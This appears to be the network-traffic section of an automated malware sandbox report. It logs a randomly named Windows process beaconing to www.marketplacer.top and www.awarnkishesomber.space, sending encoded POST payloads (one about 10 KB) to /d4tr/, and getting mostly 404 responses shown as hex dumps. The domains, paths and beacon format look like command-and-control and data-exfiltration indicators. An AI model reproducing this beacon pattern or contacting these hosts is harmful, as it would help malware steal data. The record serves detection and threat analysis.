Lo0hdeg9WjLQvfXTTQ4vBh/T7l4UqacEAFH8wCnQ4VO1A55Dj/S05yyN0TFbpnLzvKefN3R40KyK1WBFj3Q1bdMSLzZ0dTrjU3QsMtQv6WpVqDXp+Plh8 [TRUNCATED]
Nov 2, 2024 05:26:32.349487066 CET	1031	IN	HTTP/1.1 404 Not Found Date: Sat, 02 Nov 2024 04:26:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1ksiiuq1n5pbg1sr25pakmttuf; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache vary: accept-encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yc2CNGsi7npQtP%2F8D7pArr4nZEXd6eP9tpFWNQ2dASyC%2BktYkm04wnrj0haD%2FDQUekWpQyUOkUDNfxQ3yMgEtwL2%2FaH20PfKr2MzDrBJZ9o%2B21UjvAWr4G45B3zPRj80Xnw6hMmzLZyLNsby3g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dc15deeea032e1b-DFW Content-Encoding: gzip alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=1190&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10818&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49956	188.114.97.3	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:26:34.129363060 CET	443	OUT	GET /rmi6/?OrsLbfS8=t3B/ySOYfhPNBzSAJO2PeIlTvxqMvvMKm2+aczXZ+KWiESOL5TSkxmdrxkgz7erIyNCqFrrCS1YY58x1MNqIRQatYfOXWMySP/Ul5aAcDJS1p5+CjseaBkM=&5Js0X=9zex_vxPfbpDzDPp HTTP/1.1 Host: www.awarnkishesomber.space Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0
Nov 2, 2024 05:26:34.896770000 CET	977	IN	HTTP/1.1 404 Not Found Date: Sat, 02 Nov 2024 04:26:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=o2se0j5dqupb41061g4fpp3h5l; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache vary: accept-encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LZ6dp%2BKuXhfELhkmyLQ1lj09Yf1DcfMG7tSYr11zgC9Pgf8mJGYt4mU%2B52FViJ%2BMb2AGut0se0baAN28r%2BQQB2tltfMRwg2kP%2BVfjVqYIuv92sZL%2Bk3FbvjZd9Ix8HYKvUNdKk%2F5ASDpCPzqRg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dc15dfedaef315a-DFW alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=1108&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=443&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49990	194.58.112.174	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:26:40.145973921 CET	698	OUT	POST /d4tr/ HTTP/1.1 Host: www.marketplacer.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 205 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.marketplacer.top Referer: http://www.marketplacer.top/d4tr/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 33 45 4c 70 6e 47 35 52 4f 78 47 58 31 75 30 2f 77 67 51 43 50 76 2b 6b 71 67 63 79 41 6d 65 69 2b 39 71 4e 54 45 59 64 37 45 5a 54 43 68 32 58 5a 32 33 37 39 55 64 50 39 6d 42 62 68 35 50 4b 34 41 2b 45 72 76 49 37 4f 41 66 46 6f 52 61 5a 2f 62 67 44 67 46 77 48 6f 6b 2f 31 42 76 78 38 63 6f 6b 4f 63 2f 43 78 37 33 62 56 70 2b 37 42 5a 56 58 78 33 58 55 79 38 6b 65 62 4a 35 4c 39 6b 54 4d 43 70 43 58 45 2f 6b 6e 31 41 48 32 7a 66 72 47 7a 6d 31 47 46 73 77 55 69 6d 64 51 51 34 32 47 79 4b 48 75 48 45 58 35 73 32 6b 46 4d 6b 2f 47 4e 61 33 6d 68 4b 2b 37 2b 54 2b 43 72 43 67 3d 3d Data Ascii: OrsLbfS8=3ELpnG5ROxGX1u0/wgQCPv+kqgcyAmei+9qNTEYd7EZTCh2XZ2379UdP9mBbh5PK4A+ErvI7OAfFoRaZ/bgDgFwHok/1Bvx8cokOc/Cx73bVp+7BZVXx3XUy8kebJ5L9kTMCpCXE/kn1AH2zfrGzm1GFswUimdQQ42GyKHuHEX5s2kFMk/GNa3mhK+7+T+CrCg==
Nov 2, 2024 05:26:41.420646906 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 02 Nov 2024 04:26:41 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 64 31 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38 fd 94 47 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 1d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a2 2f 14 fd 54 40 7e a8 51 fc 50 fe c2 f2 1f f5 dc 3b bb cb 25 45 ca 8f 38 45 05 48 22 67 67 ee dc b9 f7 dc 73 ef cc 6c fd 74 27 74 f5 78 a8 44 4f 0f fc 66 9d fe 0a d7 97 71 dc 28 79 71 4b 76 e4 50 7b 3b aa 24 7c 19 74 1b a5 68 54 42 1f 25 3b cd fa 40 69 29 dc 9e 8c 62 a5 1b a5 f7 2f fd c2 3a 87 67 dc 1a c8 81 6a 94 86 32 ea 7b 41 b7 24 dc 30 d0 2a 40 a7 48 75 a3 91 15 41 e6 6c cf 1d 4f ed 0e c3 48 17 ba ee 7a 1d dd 6b 74 d4 8e e7 2a 8b bf d4 bc c0 d3 9e f4 ad d8 95 be 6a ac 42 84 f6 b4 af 9a bb bb bb f6 00 73 29 3d f4 a5 ab 22 5b 87 c3 ba 63 9e d5 7d 2f e8 8b 48 f9 8d 52 ac c7 be 8a 7b 4a 61 9a 81 ea 78 b2 51 92 be 5f 12 bd 48 6d e7 ca b2 72 96 1c e9 d0 76 e3 18 53 4c c7 7b 58 46 d6 7b 5b 42 af 30 b0 f1 67 7d b5 24 c8 7e 30 d7 40 76 95 73 c5 e2 8e cd 7a ec 46 de 50 37 9d 33 f5 d3 9b [TRUNCATED] Data Ascii: d1cZko_1fQRERy8G9-E!rJm4bh@/T@~QP;%E8EH"ggslt'txDOfq(yqKvP{;$\|thTB%;@i)b/:gj2{A$0@HuAlOHzktjBs)="[c}/HR{JaxQ_HmrvSL{XF{[B0g}$~0@vszFP73o^\|gS^wmIeG4(pSBRa"\|tomkr\_EQ=X8r x%HoY/GZAEc;mk_Ekh6Sm^jHLb,j&oQr<w#\|N>C%w}z\|w%h:m"fXi=/8F`]P%8ZT<KAj#P4=hrf:tUFBS8[N^kk=uV:?iuj9XL%[mvA1B}UoG+}p3&.[v{uChi>~pjZ@~iv8 b(;rGmB/vr'E"5i(rU#S5I!$z)p3utrjYAB9 \|\JzPAY'/4;@L>M&Mn~e(ab8$&n"tR\,}oCQMRA [TRUNCATED]
Nov 2, 2024 05:26:41.420670986 CET	1236	IN	Data Raw: a0 d3 8f f4 7d 3a eb d4 fd 05 82 f5 2d d4 55 5d 2f 68 f9 6a 5b 5b 26 b6 31 a1 8e c2 a0 fb 64 a7 80 8d 01 77 97 92 d9 3f 81 5e 64 2e 98 f7 71 72 0f 38 63 09 33 3c 3b 1f bc c6 38 f1 a8 6d 5c 9e 6b d2 0e c1 78 03 e4 ca 40 41 ee 9f 91 01 ef 4f 7e 8f Data Ascii: }:-U]/hj[[&1dw?^d.qr8c3<;8m\kx@AO~y<2^zgI\w@)9s@JQL7]]<d%f8> `pr`Ln-Y`.O1`e!U@/rbaa6v=r{Vt<nX1-
Nov 2, 2024 05:26:41.420681000 CET	424	IN	Data Raw: 13 2f 11 d2 0d 6c e1 2a e4 29 2f 13 16 0e 2c 1c da 2f 7a 7e d2 c1 7d 7a f9 91 5d 8d 40 f1 8e d4 b2 42 7f aa d7 4e 89 c2 8f b7 2d 2a 82 da 6d be ef c0 51 27 0e 27 ab 62 b6 13 f5 8f 14 f6 f8 c1 da cc e0 bd 53 33 5f a7 b2 70 54 da f2 3a 0b e5 ec c8 Data Ascii: /l)/,/z~}z]@BN-mQ''bS3_pT:Hb\8;RxC0z+,:;iFdx8WAWr"i4+obMX6_yoR^/WEBMgn4o9++=X-0.=yY/>#)EF^Qg`oF~4Xu#
Nov 2, 2024 05:26:41.420698881 CET	646	IN	Data Raw: 5a f4 0d 61 59 9b 01 82 26 9b 53 8e 7c d3 5c 56 97 85 17 4c 55 e1 bb c3 f5 b9 0e 17 44 d9 0b 70 75 76 09 a3 60 b4 5c 1c a9 66 fc 41 ae 2e 42 81 ab ae 7c cd 15 5a f4 f5 cd 97 ac f3 5b 55 fb ec 07 36 7f af 6e 7e f8 41 bc 75 16 b6 60 6c e4 42 0d 2b Data Ascii: ZaY&S\|\VLUDpuv`\fA.B\|Z[U6n~Au`lB+K'IplZ,}/i# 7Zeq#wElBPj!WhW%' 7HBQhEd}l-G'f,3@4P_JOR1f-S_]7G!ih,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	50003	194.58.112.174	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:26:42.698375940 CET	718	OUT	POST /d4tr/ HTTP/1.1 Host: www.marketplacer.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 225 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.marketplacer.top Referer: http://www.marketplacer.top/d4tr/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 33 45 4c 70 6e 47 35 52 4f 78 47 58 31 4f 6b 2f 78 48 45 43 4a 50 2b 37 6c 41 63 79 5a 32 65 6d 2b 39 6d 4e 54 41 49 4e 37 57 39 54 43 44 2b 58 66 43 6a 37 77 30 64 50 32 47 42 43 76 5a 4f 45 34 41 69 71 72 75 30 37 4f 41 4c 46 6f 55 6d 5a 2b 6f 34 43 6d 46 77 46 68 45 2f 33 4f 50 78 38 63 6f 6b 4f 63 38 2b 58 37 33 7a 56 70 76 72 42 66 42 37 77 39 33 55 31 71 30 65 62 4e 35 4c 35 6b 54 4d 73 70 42 53 4d 2f 6e 66 31 41 46 2b 7a 47 61 47 79 76 31 47 44 69 51 56 4e 75 34 68 42 32 46 33 2f 43 6b 4c 69 50 6d 42 66 36 43 49 57 31 4f 6e 61 49 33 43 53 58 35 79 4b 65 39 2f 69 5a 74 35 42 78 75 72 47 73 30 72 46 48 76 6e 70 59 6d 46 31 73 64 34 3d Data Ascii: OrsLbfS8=3ELpnG5ROxGX1Ok/xHECJP+7lAcyZ2em+9mNTAIN7W9TCD+XfCj7w0dP2GBCvZOE4Aiqru07OALFoUmZ+o4CmFwFhE/3OPx8cokOc8+X73zVpvrBfB7w93U1q0ebN5L5kTMspBSM/nf1AF+zGaGyv1GDiQVNu4hB2F3/CkLiPmBf6CIW1OnaI3CSX5yKe9/iZt5BxurGs0rFHvnpYmF1sd4=
Nov 2, 2024 05:26:43.582433939 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 02 Nov 2024 04:26:43 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 64 31 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38 fd 94 47 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 1d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a2 2f 14 fd 54 40 7e a8 51 fc 50 fe c2 f2 1f f5 dc 3b bb cb 25 45 ca 8f 38 45 05 48 22 67 67 ee dc b9 f7 dc 73 ef cc 6c fd 74 27 74 f5 78 a8 44 4f 0f fc 66 9d fe 0a d7 97 71 dc 28 79 71 4b 76 e4 50 7b 3b aa 24 7c 19 74 1b a5 68 54 42 1f 25 3b cd fa 40 69 29 dc 9e 8c 62 a5 1b a5 f7 2f fd c2 3a 87 67 dc 1a c8 81 6a 94 86 32 ea 7b 41 b7 24 dc 30 d0 2a 40 a7 48 75 a3 91 15 41 e6 6c cf 1d 4f ed 0e c3 48 17 ba ee 7a 1d dd 6b 74 d4 8e e7 2a 8b bf d4 bc c0 d3 9e f4 ad d8 95 be 6a ac 42 84 f6 b4 af 9a bb bb bb f6 00 73 29 3d f4 a5 ab 22 5b 87 c3 ba 63 9e d5 7d 2f e8 8b 48 f9 8d 52 ac c7 be 8a 7b 4a 61 9a 81 ea 78 b2 51 92 be 5f 12 bd 48 6d e7 ca b2 72 96 1c e9 d0 76 e3 18 53 4c c7 7b 58 46 d6 7b 5b 42 af 30 b0 f1 67 7d b5 24 c8 7e 30 d7 40 76 95 73 c5 e2 8e cd 7a ec 46 de 50 37 9d 33 f5 d3 9b [TRUNCATED] Data Ascii: d1cZko_1fQRERy8G9-E!rJm4bh@/T@~QP;%E8EH"ggslt'txDOfq(yqKvP{;$\|thTB%;@i)b/:gj2{A$0@HuAlOHzktjBs)="[c}/HR{JaxQ_HmrvSL{XF{[B0g}$~0@vszFP73o^\|gS^wmIeG4(pSBRa"\|tomkr\_EQ=X8r x%HoY/GZAEc;mk_Ekh6Sm^jHLb,j&oQr<w#\|N>C%w}z\|w%h:m"fXi=/8F`]P%8ZT<KAj#P4=hrf:tUFBS8[N^kk=uV:?iuj9XL%[mvA1B}UoG+}p3&.[v{uChi>~pjZ@~iv8 b(;rGmB/vr'E"5i(rU#S5I!$z)p3utrjYAB9 \|\JzPAY'/4;@L>M&Mn~e(ab8$&n"tR\,}oCQMRA [TRUNCATED]
Nov 2, 2024 05:26:43.582451105 CET	1236	IN	Data Raw: a0 d3 8f f4 7d 3a eb d4 fd 05 82 f5 2d d4 55 5d 2f 68 f9 6a 5b 5b 26 b6 31 a1 8e c2 a0 fb 64 a7 80 8d 01 77 97 92 d9 3f 81 5e 64 2e 98 f7 71 72 0f 38 63 09 33 3c 3b 1f bc c6 38 f1 a8 6d 5c 9e 6b d2 0e c1 78 03 e4 ca 40 41 ee 9f 91 01 ef 4f 7e 8f Data Ascii: }:-U]/hj[[&1dw?^d.qr8c3<;8m\kx@AO~y<2^zgI\w@)9s@JQL7]]<d%f8> `pr`Ln-Y`.O1`e!U@/rbaa6v=r{Vt<nX1-
Nov 2, 2024 05:26:43.582463980 CET	424	IN	Data Raw: 13 2f 11 d2 0d 6c e1 2a e4 29 2f 13 16 0e 2c 1c da 2f 7a 7e d2 c1 7d 7a f9 91 5d 8d 40 f1 8e d4 b2 42 7f aa d7 4e 89 c2 8f b7 2d 2a 82 da 6d be ef c0 51 27 0e 27 ab 62 b6 13 f5 8f 14 f6 f8 c1 da cc e0 bd 53 33 5f a7 b2 70 54 da f2 3a 0b e5 ec c8 Data Ascii: /l)/,/z~}z]@BN-mQ''bS3_pT:Hb\8;RxC0z+,:;iFdx8WAWr"i4+obMX6_yoR^/WEBMgn4o9++=X-0.=yY/>#)EF^Qg`oF~4Xu#
Nov 2, 2024 05:26:43.582472086 CET	646	IN	Data Raw: 5a f4 0d 61 59 9b 01 82 26 9b 53 8e 7c d3 5c 56 97 85 17 4c 55 e1 bb c3 f5 b9 0e 17 44 d9 0b 70 75 76 09 a3 60 b4 5c 1c a9 66 fc 41 ae 2e 42 81 ab ae 7c cd 15 5a f4 f5 cd 97 ac f3 5b 55 fb ec 07 36 7f af 6e 7e f8 41 bc 75 16 b6 60 6c e4 42 0d 2b Data Ascii: ZaY&S\|\VLUDpuv`\fA.B\|Z[U6n~Au`lB+K'IplZ,}/i# 7Zeq#wElBPj!WhW%' 7HBQhEd}l-G'f,3@4P_JOR1f-S_]7G!ih,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	50019	194.58.112.174	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:26:45.249924898 CET	10800	OUT	POST /d4tr/ HTTP/1.1 Host: www.marketplacer.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 10305 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.marketplacer.top Referer: http://www.marketplacer.top/d4tr/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 33 45 4c 70 6e 47 35 52 4f 78 47 58 31 4f 6b 2f 78 48 45 43 4a 50 2b 37 6c 41 63 79 5a 32 65 6d 2b 39 6d 4e 54 41 49 4e 37 57 31 54 44 32 71 58 63 6c 50 37 78 30 64 50 71 32 42 48 76 5a 4f 4a 34 41 71 6d 72 75 34 42 4f 44 7a 46 71 32 65 5a 72 70 34 43 7a 31 77 46 73 6b 2f 30 42 76 78 6c 63 72 63 4b 63 2f 47 58 37 33 7a 56 70 73 6a 42 4a 6c 58 77 37 33 55 79 38 6b 65 48 4a 35 4c 52 6b 51 38 61 70 41 6e 75 2f 33 2f 31 46 56 4f 7a 64 49 2b 79 79 46 47 42 6c 51 56 56 75 34 6b 5a 32 46 37 5a 43 6c 75 4a 50 6d 6c 66 70 31 74 70 69 73 72 75 66 55 32 68 48 37 76 31 61 66 2f 61 66 38 68 6c 39 65 6a 37 33 51 66 41 42 38 4c 6e 64 46 64 4f 74 64 43 42 50 71 2f 61 65 6e 45 39 2b 42 67 58 50 68 69 34 76 55 58 4c 42 6d 56 42 55 46 69 67 36 35 6c 4e 2b 35 48 74 2f 6c 6b 41 46 53 30 65 6a 41 34 54 49 6f 55 4a 52 57 4a 31 73 34 56 49 6c 6c 4c 64 6f 4e 51 59 4c 5a 68 4a 59 77 62 67 6e 6a 51 64 67 6b 50 47 7a 76 32 58 44 38 33 62 77 56 79 30 4f 44 78 73 42 61 30 41 39 71 62 6f 39 48 31 73 69 [TRUNCATED] Data Ascii: OrsLbfS8=3ELpnG5ROxGX1Ok/xHECJP+7lAcyZ2em+9mNTAIN7W1TD2qXclP7x0dPq2BHvZOJ4Aqmru4BODzFq2eZrp4Cz1wFsk/0BvxlcrcKc/GX73zVpsjBJlXw73Uy8keHJ5LRkQ8apAnu/3/1FVOzdI+yyFGBlQVVu4kZ2F7ZCluJPmlfp1tpisrufU2hH7v1af/af8hl9ej73QfAB8LndFdOtdCBPq/aenE9+BgXPhi4vUXLBmVBUFig65lN+5Ht/lkAFS0ejA4TIoUJRWJ1s4VIllLdoNQYLZhJYwbgnjQdgkPGzv2XD83bwVy0ODxsBa0A9qbo9H1siH4JXYgLqGgcwsIx2OvFKybAlIUpdK1eWjsZR7EmRArJOb38cvEoPIKqs8TAeh/HkSICR2yPfIlpsNntfyGXE7fqwzaH39lVIF9uhRP8UFkiSoY1SHpbBTD46TBPxvwIOqsLYRhmuCt1Vmn6eC0E4+AtzN2QuovdFoEBwNHZrmZL8uCY/Q9RuG1HZZx+ga3ZLOKDkrBXNhx7No4ENxF1gVa9o1yalSsGE5eE3js+fgNrVcFEk0g5j4G56XOm6BrBcNuWXYLdvQF9Oqq3QUP7W4NNYzpXuajHjGqy5sBiBGlsxIPqgwB9fnaMfuXmm432T1XkCsvXJhfCCFpgmAieZxJVE38v7uM7WccV2MWL2+xs0X3ecys0WBVUcNM5Kc7fs2+K1SrVRsA+vUpdJNEocov/X1yX8MhTzxVjcGUQSfvcYSBF/HQV2dq2RNvG6kylbrjBqWAqGZjhcLNBSO8+Ccoz1xcZesC+8Gxdor0EFqXyvbC/4DwPQfQw0Qtd25Us9JhQO6d8ChYL9KMz5kdCK3tvp6rDJUHmdd0Uwf91C9JGRsNcbMVj/mXxIlvoxbBsKWRS5bFLoVqNrJSp7yASMJDHDtFXo1ydVdTjdQHFqk64idkXhS2gSdCjReNOJP6j71pRtVPi0Zz3Wyozo20vIloDwUSjry3xV/O [TRUNCATED]
Nov 2, 2024 05:26:46.156958103 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 02 Nov 2024 04:26:46 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 64 31 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38 fd 94 47 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 1d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a2 2f 14 fd 54 40 7e a8 51 fc 50 fe c2 f2 1f f5 dc 3b bb cb 25 45 ca 8f 38 45 05 48 22 67 67 ee dc b9 f7 dc 73 ef cc 6c fd 74 27 74 f5 78 a8 44 4f 0f fc 66 9d fe 0a d7 97 71 dc 28 79 71 4b 76 e4 50 7b 3b aa 24 7c 19 74 1b a5 68 54 42 1f 25 3b cd fa 40 69 29 dc 9e 8c 62 a5 1b a5 f7 2f fd c2 3a 87 67 dc 1a c8 81 6a 94 86 32 ea 7b 41 b7 24 dc 30 d0 2a 40 a7 48 75 a3 91 15 41 e6 6c cf 1d 4f ed 0e c3 48 17 ba ee 7a 1d dd 6b 74 d4 8e e7 2a 8b bf d4 bc c0 d3 9e f4 ad d8 95 be 6a ac 42 84 f6 b4 af 9a bb bb bb f6 00 73 29 3d f4 a5 ab 22 5b 87 c3 ba 63 9e d5 7d 2f e8 8b 48 f9 8d 52 ac c7 be 8a 7b 4a 61 9a 81 ea 78 b2 51 92 be 5f 12 bd 48 6d e7 ca b2 72 96 1c e9 d0 76 e3 18 53 4c c7 7b 58 46 d6 7b 5b 42 af 30 b0 f1 67 7d b5 24 c8 7e 30 d7 40 76 95 73 c5 e2 8e cd 7a ec 46 de 50 37 9d 33 f5 d3 9b [TRUNCATED] Data Ascii: d1cZko_1fQRERy8G9-E!rJm4bh@/T@~QP;%E8EH"ggslt'txDOfq(yqKvP{;$\|thTB%;@i)b/:gj2{A$0@HuAlOHzktjBs)="[c}/HR{JaxQ_HmrvSL{XF{[B0g}$~0@vszFP73o^\|gS^wmIeG4(pSBRa"\|tomkr\_EQ=X8r x%HoY/GZAEc;mk_Ekh6Sm^jHLb,j&oQr<w#\|N>C%w}z\|w%h:m"fXi=/8F`]P%8ZT<KAj#P4=hrf:tUFBS8[N^kk=uV:?iuj9XL%[mvA1B}UoG+}p3&.[v{uChi>~pjZ@~iv8 b(;rGmB/vr'E"5i(rU#S5I!$z)p3utrjYAB9 \|\JzPAY'/4;@L>M&Mn~e(ab8$&n"tR\,}oCQMRA [TRUNCATED]
Nov 2, 2024 05:26:46.156971931 CET	1236	IN	Data Raw: a0 d3 8f f4 7d 3a eb d4 fd 05 82 f5 2d d4 55 5d 2f 68 f9 6a 5b 5b 26 b6 31 a1 8e c2 a0 fb 64 a7 80 8d 01 77 97 92 d9 3f 81 5e 64 2e 98 f7 71 72 0f 38 63 09 33 3c 3b 1f bc c6 38 f1 a8 6d 5c 9e 6b d2 0e c1 78 03 e4 ca 40 41 ee 9f 91 01 ef 4f 7e 8f Data Ascii: }:-U]/hj[[&1dw?^d.qr8c3<;8m\kx@AO~y<2^zgI\w@)9s@JQL7]]<d%f8> `pr`Ln-Y`.O1`e!U@/rbaa6v=r{Vt<nX1-
Nov 2, 2024 05:26:46.156989098 CET	424	IN	Data Raw: 13 2f 11 d2 0d 6c e1 2a e4 29 2f 13 16 0e 2c 1c da 2f 7a 7e d2 c1 7d 7a f9 91 5d 8d 40 f1 8e d4 b2 42 7f aa d7 4e 89 c2 8f b7 2d 2a 82 da 6d be ef c0 51 27 0e 27 ab 62 b6 13 f5 8f 14 f6 f8 c1 da cc e0 bd 53 33 5f a7 b2 70 54 da f2 3a 0b e5 ec c8 Data Ascii: /l)/,/z~}z]@BN-mQ''bS3_pT:Hb\8;RxC0z+,:;iFdx8WAWr"i4+obMX6_yoR^/WEBMgn4o9++=X-0.=yY/>#)EF^Qg`oF~4Xu#
Nov 2, 2024 05:26:46.156999111 CET	646	IN	Data Raw: 5a f4 0d 61 59 9b 01 82 26 9b 53 8e 7c d3 5c 56 97 85 17 4c 55 e1 bb c3 f5 b9 0e 17 44 d9 0b 70 75 76 09 a3 60 b4 5c 1c a9 66 fc 41 ae 2e 42 81 ab ae 7c cd 15 5a f4 f5 cd 97 ac f3 5b 55 fb ec 07 36 7f af 6e 7e f8 41 bc 75 16 b6 60 6c e4 42 0d 2b Data Ascii: ZaY&S\|\VLUDpuv`\fA.B\|Z[U6n~Au`lB+K'IplZ,}/i# 7Zeq#wElBPj!WhW%' 7HBQhEd}l-G'f,3@4P_JOR1f-S_]7G!ih,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	50023	194.58.112.174	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:26:47.790350914 CET	437	OUT	GET /d4tr/?OrsLbfS8=6GjJkyBPORqg+LRL5wohL8uehUs1YRairNTTSlIQnk9ILDzDMm7A4CMaqzx5lMKV1BWl24o1RRPKkV6Hwvttmy1MvEOfL/ZPV6gHev677HWBpMjxIhSB53M=&5Js0X=9zex_vxPfbpDzDPp HTTP/1.1 Host: www.marketplacer.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0
Nov 2, 2024 05:26:48.706985950 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 02 Nov 2024 04:26:48 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 32 34 66 63 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 6d 61 72 6b 65 74 70 6c 61 63 65 72 2e 74 6f 70 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 